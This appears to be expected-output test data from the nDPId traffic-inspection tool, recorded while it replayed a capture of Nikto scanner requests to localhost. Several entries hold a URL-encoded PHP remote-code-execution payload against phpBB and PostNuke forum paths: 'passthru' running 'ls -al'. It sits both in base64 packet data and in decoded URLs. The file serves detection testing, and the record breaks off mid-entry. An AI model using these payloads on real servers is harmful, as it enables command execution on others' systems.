-00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277813,"pkt":"AAAAAAAAAAAAAAAACABFAAFt2OpAAEAGYp5\/AAABfwAAAccGH5BS6uHGYiCIs4AYAED\/YQAAAQEICp1m\/12dZv9dR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277814,"pkt":"AAAAAAAAAAAAAAAACABFAAFt1fZAAEAGZZJ\/AAABfwAAAccIH5Bl1OzaDJYmQ4AYAED\/YQAAAQEICp1m\/16dZv9eR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277816,"pkt":"AAAAAAAAAAAAAAAACABFAAFmyD5AAEAGc1F\/AAABfwAAAccKH5CvpPET10Ucz4AYAED\/WgAAAQEICp1m\/2CdZv9gR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277817,"pkt":"AAAAAAAAAAAAAAAACABFAAFvTQNAAEAG7oN\/AAABfwAAAccMH5C7inQwMMPyYoAYAED\/YwAAAQEICp1m\/2GdZv9hR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277819,"pkt":"AAAAAAAAAAAAAAAACABFAAF0lOFAAEAGpqB\/AAABfwAAAccOH5D5PK3yk85ZF4AYAED\/aAAAAQEICp1m\/2KdZv9iR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01239{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277821,"pkt":"AAAAAAAAAAAAAAAACABFAAFu9rlAAEAGRM5\/AAABfwAAAccQH5BepM+ZKyRDwoAYAED\/YgAAAQEICp1m\/2WdZv9lR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277822,"pkt":"AAAAAAAAAAAAAAAACABFAAFs7qZAAEAGTON\/AAABfwAAAccSH5AvkdeM6hywhIAYAED\/YAAAAQEICp1m\/2adZv9mR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277824,"pkt":"AAAAAAAAAAAAAAAACABFAAFsidNAAEAGsbZ\/AAABfwAAAccUH5D2t7Di3ewIxYAYAED\/YAAAAQEICp1m\/2idZv9oR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCg0K"} 
-01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277827,"pkt":"AAAAAAAAAAAAAAAACABFAAFnzSRAAEAGbmp\/AAABfwAAAccWH5CSlfQTmmOJAIAYAED\/WwAAAQEICp1m\/2qdZv9qR0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
